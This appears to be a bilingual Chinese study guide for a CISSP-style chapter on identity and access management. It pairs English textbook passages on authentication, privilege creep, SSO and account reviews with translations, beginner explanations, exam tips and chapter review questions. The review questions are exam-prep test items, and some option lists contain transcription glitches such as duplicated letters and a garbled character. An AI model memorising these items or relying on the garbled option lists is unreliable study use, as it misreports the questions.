with security policies. This includes user accounts, privileged accounts, system accounts, and service accounts. The “Device Authentication” section in this chapter discussed system accounts, such as those assigned to computers, and the “Service Authentication” section in this chapter discussed service accounts. The local system account on computers typically has the same privileges as the local administrator account. This approach allows the computer to access other computers on the network as the computer, instead of as a user. Some applications use the local system account as the service account.

This approach allows the application to run without creating a special service account, but it often grants the application more access than it needs. If an attacker exploits an application vulnerability, the attacker may gain access to the service account. Many administrators use scripts to check for inactive accounts periodically. For example, a script can locate accounts that users have not logged onto in the past 30 days and automatically disable them. Similarly, scripts can check group membership of privileged groups (such as administrator groups) and remove unauthorized accounts. Routine auditing procedures often include account reviews.

Privilege monitoring audits accounts that have elevated privileges. This includes any accounts with administrator privileges such as administrator accounts, root accounts, service accounts, or any account that has more privileges than a regular user. It's important to guard against two problems related to access control: excessive privilege and privilege creep. Excessive privilege occurs when users have more privileges than their assigned work tasks dictate. If a user account has excessive privileges, administrators should revoke unnecessary privileges. Privilege creep involves a user account accumulating additional privileges over time as job roles and assigned tasks change.

As an example, imagine Karen is working in the accounting department and transfers to the sales department. She has privileges in the accounting department, and when she transfers to sales, she's granted the privileges needed in the sales department. If administrators don't remove her rights and permissions in accounting, she retains excessive privileges. Both excessive privileges and privilege creep violate the basic security principle of least privilege, and account reviews are effective at discovering these problems.

中文直译 / 整理

安全策略。 这包括用户账户、特权账户、系统账户和服务账户。 本章的“设备 身份验证”部分讨论了系统账户,例如分配给计算机的账户; 本章的“服务身 份验证”部分讨论了服务账户。 计算机上的本地系统账户通常具有与本地管理员账户相同的权限。 这种方法允 许计算机以计算机身份而非用户身份访问网络上的其他计算机。 某些应用程序 将本地系统账户用作服务账户。 这种方法使应用程序无需创建专用服务账户即 可运行,但通常会赋予应用程序超出其所需范围的访问权限。 如果攻击者利用 应用程序的漏洞,可能会获得服务账户的访问权限。 许多管理员使用脚本定期检查不活动的账户。 例如,脚本可以定位过去30天 内未登录的账户并自动禁用它们。 类似地,脚本可以检查特权组(如管理员组) 的成员资格并移除未经授权的账户。 常规审计程序通常包括账户审查。 权限监控审计具有提升权限的账户。 这包括任何具有管理员权限的账户,例 如管理员账户、root账户、服务账户或任何比普通用户拥有更多权限的账 户。 防范与访问控制相关的两个问题非常重要:权限过度和权限累积。 权限过度是 指用户拥有超出其分配工作任务所需的权限。

如果用户账户存在权限过度的情 况,管理员应撤销不必要的权限。 权限膨胀是指用户账户随着职位角色和分配任务的变化而随着时间推移累积额 外权限。 例如,假设凯伦在会计部门工作,后调至销售部门。 她原本拥有会计 部门的权限,调至销售部门后,又被授予销售部门所需的权限。 如果管理员未 移除她在会计部门的权限和访问权,她就会保留过多的权限。 过多的权限和权 限膨胀都违反了最小权限这一基本安全原则,而账户审查能有效发现这些问题。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 43 / PDF P959

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Summary Identity and access management (IAM) covers the management, administration, and implementation aspects of granting or restricting access to assets. Assets include personnel, information, systems, devices, facilities, applications, or services. Organizations use both physical and logical access controls to protect them. Identification is the process of a subject claiming, or professing, an identity. Authentication verifies the subject's identity by comparing one or more authentication factors against a database holding authentication information for users. The three primary authentication factors are something you know, something you have, and something you are.

Multifactor authentication uses more than one authentication factor, and it is stronger than using any single authentication factor. Single sign-on (SSO) technologies allow users to authenticate once and access any resources in a network without authenticating again. Internal networks commonly use SSO, and SSO capabilities are also available on the Internet and via the cloud. Federated identity management (FIM) systems link user identities in one system with other systems to implement SSO. The identity and access provisioning life cycle includes creating, managing, reviewing/auditing, and deleting accounts used by subjects.

Provisioning includes creating the accounts and ensuring that they are granted appropriate access to objects and issuing employees the hardware they need for their job. Onboarding processes inform employees of organizational processes and help set up new employees for success. Deprovisioning processes disable or delete an account when employees leave, and offboarding processes ensure that employees return all the hardware an organization issued to them. Study Essentials Know how physical access controls protect assets. Physical access controls are those you can touch, and they directly protect systems, devices, and facilities by controlling access and controlling the environment.

Indirectly, they also protect information and applications by limiting physical access. Know how logical access controls protect assets. Logical access controls include authentication, authorization, and permissions. They limit

中文直译 / 整理

摘要 身份与访问管理(IAM)涵盖授予或限制对资产访问的管理、行政和实施方 面。 资产包括人员、信息、系统、设备、设施、应用程序或服务。 组织使用物 理和逻辑访问控制来保护这些资产。 身份识别是主体声明或声称身份的过程。 身份验证通过将一个或多个身份验证 因素与存储用户身份验证信息的数据库进行比对,来验证主体的身份。 三大主 要身份验证因素包括:你知道的东西、你拥有的东西和你自身的特征。 多因素 身份验证使用多个身份验证因素,其安全性高于仅使用单一身份验证因素。 单点登录(SSO)技术允许用户仅进行一次身份验证,即可访问网络中的任何 资源而无需再次验证。 内部网络通常使用SSO,同时SSO功能也可在互联网和 云环境中使用。 联邦身份管理(FIM)系统将一个系统中的用户身份与其他系 统关联,以实现单点登录。 身份与访问配置生命周期包括创建、管理、审查/审计以及删除主体使用的账户。 配置包括创建账户,确保其获得对对象的适当访问权限,并为员工发放其工作 所需的硬件。 入职流程向员工介绍组织流程,帮助新员工顺利适应。 离职流程 在员工离开时禁用或删除其账户,而离岗流程则确保员工归还组织发放的所有 硬件。

学习必备 了解物理访问控制如何保护资产。 物理访问控制是您可以触摸到的控制措施, 它们通过控制访问和环境来直接保护系统、设备和设施。 间接地,它们也通过 限制物理访问来保护信息和应用程序。 了解逻辑访问控制如何保护资产。 逻辑访问控制包括身份验证、授权和权限。 它们限制

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 44 / PDF P960

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

who can access information, settings, and use of information, systems, devices, facilities, applications, and services. Know the difference between subjects and objects. You'll find that Security documentation commonly uses the terms subject and object, so it's important to know the difference between them. Subjects are active entities (such as users) that access passive objects (such as files). A user is a subject who accesses objects while performing some action or accomplishing a work task. Know the components of the AAA model of access control. The AAA model includes three major components. Authentication confirms that a user, device, or service is who it claims to be.

Authorization ensures that users, devices, and services may only perform actions that they are entitled to perform. Accounting creates an audit trail of activity that may be later verified. Know the difference between identification and authentication. Access controls depend on effective identification and authentication. Subjects claim an identity, and identification can be as simple as a username for a user. Subjects prove their identity by providing authentication credentials such as the matching password for a username. People, devices, and services all verify their identity by giving proper credentials. Understand the establishment of identity, registration, and proofing.

New employees establish their identities with official documentation such as a passport, driver's license, or birth certificate. HR personnel then begin the registration process, which includes creating an account for new employees. When biometric authentication is used, the registration process also collects biometric data. Identity proofing includes knowledge-based authentication and cognitive passwords. These ask users a series of questions that only the user would know. Understand the difference between authorization and accounting. After authenticating subjects, systems authorize access to objects based on their proven identity.

Auditing logs and audit trails record events, including the identity of the subject that performed an action. The combination of effective identification, authentication, and auditing provides accountability. Know the primary authentication factors. The three primary factors of authentication are something you know (such as a password or PIN), something you have (such as a smartcard or authenticator device), and

中文直译 / 整理

谁可以访问信息、设置以及信息、系统、设备、设施、应用程序和服务的使 用。 了解主体与客体之间的区别。 您会发现,安全文档中常使用主体和客体这两个 术语,因此了解它们之间的区别非常重要。 主体是主动实体(如用户),访问 被动的客体(如文件)。 用户是主体,通过执行某些操作或完成工作任务来访 问客体。 了解AAA访问控制模型的组成部分。 AAA模型包括三个主要组成部分。 认证确认 用户、设备或服务的身份与其声称的一致。 授权确保用户、设备和服务只能执行 其被允许执行的操作。 计费则创建可后续核查的活动审计跟踪。 了解标识与认证之间的区别。 访问控制依赖于有效的标识和认证。 主体声明一 个身份,标识可以像用户名那样简单。 主体通过提供认证凭证(如与用户名匹 配的密码)来证明其身份。 人员、设备和服务都通过提供正确的凭证来验证其 身份。 了解身份、注册和验证的建立。 新员工通过护照、驾驶证或出生证明等官方文 件建立其身份。 人力资源人员随后开始注册流程,包括为新员工创建账户。 当 使用生物识别认证时,注册流程还会收集生物识别数据。 身份验证包括基于知 识的认证和认知密码,这些问题只有用户本人才能回答。 了解授权与 记账。

在对主体进行身份验证后,系统根据其经验证的身份授权访问对象。 审 计日志和审计跟踪记录事件,包括执行操作的主体身份。 有效的身份识别、身 份验证和审计相结合,可实现责任追溯。 了解主要的身份验证因素。 身份验证的三个主要因素是:你知道的东西(例如 密码或PIN码)、你拥有的东西(例如智能卡或认证设备)和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 45 / PDF P961

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

something you are (based on biometrics). Multifactor authentication (MFA) includes two or more authentication factors, and using MFA is more secure than using a single authentication factor. Understand important authentication concepts. Passwords are the weakest form of authentication, but password policies help increase their security by enforcing complexity and history requirements. Smartcards include microprocessors and cryptographic certificates, and authenticators create one-time passwords (OTPs). Biometric methods identify users based on characteristics such as fingerprints.

The crossover error rate (CER) identifies the accuracy of a biometric method and shows where the false rejection rate (FRR) is equal to the false acceptance rate (FAR). Lower CERs are more accurate. Understand single sign-on. Single sign-on (SSO) is a mechanism that allows subjects to authenticate once and access multiple objects without authenticating again. Describe how federated identity systems are implemented. FIM systems are implemented on-premises (providing the most control), via a third-party cloud service or as a hybrid of both. Describe Just-in-Time (JIT) provisioning. Just-in-Time provisioning creates user accounts on third-party sites the first time a user logs onto the site.

JIT reduces the administrative workload. Know about credential management systems. Credential management systems help developers easily store usernames and passwords and retrieve them when a user revisits a website. The W3C published the Credential Management API as a working draft in 2019, and developers commonly use it as a credential management system. It allows users to log on automatically to websites without entering their credentials again. Explain session management. Session management processes help prevent unauthorized access by closing unattended sessions. Developers commonly use web frameworks to implement session management.

These frameworks allow developers to ensure sessions are closed after a specific amount of inactivity, such as after 2 minutes. Understand the identity and access provisioning life cycle. The identity and access provisioning life cycle refers to the creation, management, and deletion of accounts. Provisioning ensures that accounts have appropriate privileges based on task requirements and employees receive any

中文直译 / 整理

你本身的特征(基于生物识别)。 多因素认证(MFA)包含两个或更多身份 验证因素,使用MFA比仅使用单一身份验证因素更安全。 理解重要的身份验证概念。 密码是最弱的身份验证形式,但密码策略通过强制 复杂性和历史要求来提高其安全性。 智能卡包含微处理器和加密证书,而身份 验证器会生成一次性密码(OTP)。 生物识别方法基于指纹等特征识别用户。 交叉错误率(CER)用于衡量生物识别方法的准确性,显示错误拒绝率( FRR)等于错误接受率(FAR)的点。 CER值越低,准确性越高。 理解单点登录。 单点登录(SSO)是一种机制,允许主体进行一次身份验证 后,无需再次验证即可访问多个对象。 描述联合身份系统是如何实现的。 联合身份管理(FIM)系统可在本地部署 (提供最大程度的控制)、通过第三方云服务,或作为两者的混合方式实现。 描述即时(JIT)配置。 即时配置在用户首次登录第三方网站时创建用户账户。 JIT减少了管理负担。 了解凭据管理系统。 凭据 管理系统帮助开发人员轻松存储用户名和密码,并在用户重新访问网站时检索 它们。 W3C于2019年发布了凭据管理API作为工作草案,开发人员通常将其用 作凭据管理系统。

它允许用户无需再次输入凭据即可自动登录网站。 解释会话管理。 会话管理流程通过关闭无人值守的会话来防止未经授权的访问。 开发人员通常使用Web框架来实现会话管理。 这些框架允许开发人员确保在 特定的不活动时间后(例如2分钟后)关闭会话。 了解身份和访问配置的生命周期。 身份和访问配置生命周期是指账户的创建、管 理和删除。 配置确保账户根据任务需求拥有适当的权限,员工获得任何

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

证书不是密钥本身,而是身份与公钥的可信绑定。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 46 / PDF P962

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

needed hardware. Onboarding processes inform employees of organizational processes. Deprovisioning processes disable or delete an account when employees leave, and offboarding processes ensure that employees return all the hardware an organization issued to them. Explain the importance of group and role definition and transition. When an organization creates new job roles, it's important to identify privileges needed by anyone in these new roles. Doing so ensures that employees in these new roles do not have excessive privileges. These roles are commonly mapped to groups in the authentication system and then privileges are assigned to those roles.

When users transition from one job to another, their group membership should be modified to follow those changes Describe the purpose of account access reviews. Account access reviews are performed on user accounts (including privileged accounts), system accounts, and service accounts. These reviews ensure that accounts don't have excessive privileges. They can often detect when accounts have excessive privileges and when unused accounts have not been disabled or deleted. Written Lab 1. List some physical and logical access controls used to protect assets. 2. Describe the differences between identification, authentication, authorization, and accounting. 3.

Describe the three primary authentication factor types. 4. Name the method that allows users to log on once and access resources in multiple organizations without authenticating again. 5. Identify the processes an organization follows when hiring an employee and when an employee leaves. Review Questions 1. An organization is considering creating a cloud-based federation using a third-party service to share federated identities. After it's completed, what will people use as their login ID? A. Their normal account

中文直译 / 整理

所需的硬件。 入职流程向员工告知组织流程。 离职流程在员工离开时禁用或删 除账户,而离岗流程确保员工归还组织发放给他们的所有硬件。 解释组和角色定义的重要性以及 过渡。 当组织创建新的职位角色时,必须识别这些新角色所需的权限。 这样做 可以确保新角色的员工不会拥有过多的权限。 这些角色通常映射到身份验证系统 中的组,然后将权限分配给这些组。 当用户从一个职位转到另一个职位时,其组 成员资格应随之调整 描述账户访问审查的目的。 账户访问审查针对用户账户(包括特权账户)、系 统账户和服务账户进行。 这些审查确保账户不会拥有过度的权限,并且通常能 够检测到账户拥有过度权限或未被禁用或删除的闲置账户。 书面实验 1. 列出一些用于保护资产的物理和逻辑访问控制措施。 2. 描述标识、认证 , 授权和计费之间的区别。 3. 描述三种主要的身份验证因素类型。 4. 名称允许用户一次登录并无需再次身份验证即可访问多个组织资源的方法。 5. 确定组织在雇用员工和员工离职时所遵循的流程。 复习问题 1. 一个组织正在考虑使用第三方服务创建基于云的联合,以共享联合身份。 完成后,人们将使用什么作为他们的登录ID? A. 他们的常规账户

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P963

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

B. An account given to them from the cloud-based federation C. Hybrid identity management D. Single-sign on 2. Which of the following best expresses the primary goal when controlling access to assets? A. Preserve confidentiality, integrity, and availability of systems and data. B. Ensure that only valid objects can authenticate on a system. C. Prevent unauthorized access to subjects. D. Ensure that all subjects are authenticated. 3. Which of the following is true related to a subject? A. A subject is always a user account. B. The subject is always the entity that provides or hosts information or data. C. The subject is always the entity that receives information about or data from an object.

D. A single entity can never change roles between subject and object. 4. Based on advice from the National Institute of Standards and Technology (NIST), when should regular users be required to change their passwords? A. Every 30 days B. Every 60 days C. Every 90 days D. Only if the current password is compromised 5. Security administrators have learned that users are switching between two passwords. When the system prompts them to change their password, they use the second password. When the system prompts them to change their password again, they use the first password. What can prevent users from rotating between two passwords? A. Password complexity B. Password history B.

中文直译 / 整理

从基于云的联合服务分配给他们的账户 C. 混合身份管理 D. 单点登录 2. 以下哪项 最能 表达控制资产访问时的主要目标? A. 保护系统和数据的机密性、完整性和可用性。 B. 确保只有有效的对象才能在系统上进行身份验证。 C. 防止未经授权的主体访问。 D. 确保所有主体均经过身份验证。 3. 以下哪项关于主体的说法是正确的? A. 主体始终是用户账户。 B. 主体始终是提供或托管信息或数据的实体。 C. 主体始终是接收有关对象的信息或数据的实体。 D. 单个实体绝不能在主体和对象之间切换角色。 4. 根据美国国家标准与技术研究院(NIST)的建议,普通用户应在何时被要 求更改密码? A. 每30天 B. 毇. 每60天 C. 每90天 D. 仅当当前密码被泄露时 5. 安全管理员发现,用户在两个密码之间轮换。 当系统提示他们更改密码 时,他们使用第二个密码; 当系统再次提示他们更改密码时,他们又使用 第一个密码。 如何防止用户在两个密码之间轮换? A. 密码复杂度 B. 密码历史

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 48 / PDF P964

第 964 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. Password length D. Password age 6. Which of the following best identifies the benefit of a passphrase? A. It is short. B. It is easy to remember. C. It includes a single set of characters. D. It is easy to crack. 7. Your organization issues devices to employees. These devices generate one-time passwords every 60 seconds. A server hosted within the organization knows what this password is at any given time. What type of device is this? A. Synchronous authenticator B. Asynchronous authenticator C. Smartcard D. Common access card 8. What does the CER for a biometric device indicate? A. It indicates that the sensitivity is too high. B. It indicates that the sensitivity is too low. C.

It indicates the point where the false rejection rate equals the false acceptance rate. D. When high enough, it indicates the biometric device is highly accurate. 9. Sally has a user account and has previously logged on using a biometric system. Today, the biometric system didn't recognize her, so she wasn't able to log on. What does this describe? A. False rejection B. False acceptance C. Crossover error D. Equal error C.

中文直译 / 整理

密码长度 D. 密码有效期 6. 以下哪项最佳体现了口令的好处? A. 它很短。 B. 它容易记住。 C. 它包含一组字符。 D. 容易被破解。 7. 您的组织向员工发放设备。 这些设备每60秒生成一次一次性密码。 组织内 部托管的服务器知道在任何给定时间该密码是什么。 这是什么类型的设备? A. 同步认证器 B. 异步认证器 C. 智能卡 D. 共同访问卡 8. 生物识别设备的CER表示什么? A. 它表示灵敏度过高。 B. 它表示灵敏度过低。 C. 它表示误拒率等于误接受率的点。 D. 当CER足够高时,它表示生物识别设备具有很高的准确性。 9. Sally拥有一个用户账户,并曾使用生物识别系统登录过。 今天,生物识 别系统未能识别她,因此她无法登录。 这描述的是什么情况? A. 错误拒绝 B. 错误接受 C. 交叉错误 D. 等误

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 964 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 49 / PDF P965

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

